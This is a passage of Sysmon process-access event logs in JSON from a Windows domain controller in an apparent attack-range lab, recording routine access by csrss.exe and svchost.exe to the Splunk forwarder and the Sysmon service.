Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010C97B0300}","TargetProcessId":"4004","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2104,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2105,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2106,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2107,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2108,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2109,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2110,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2111,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 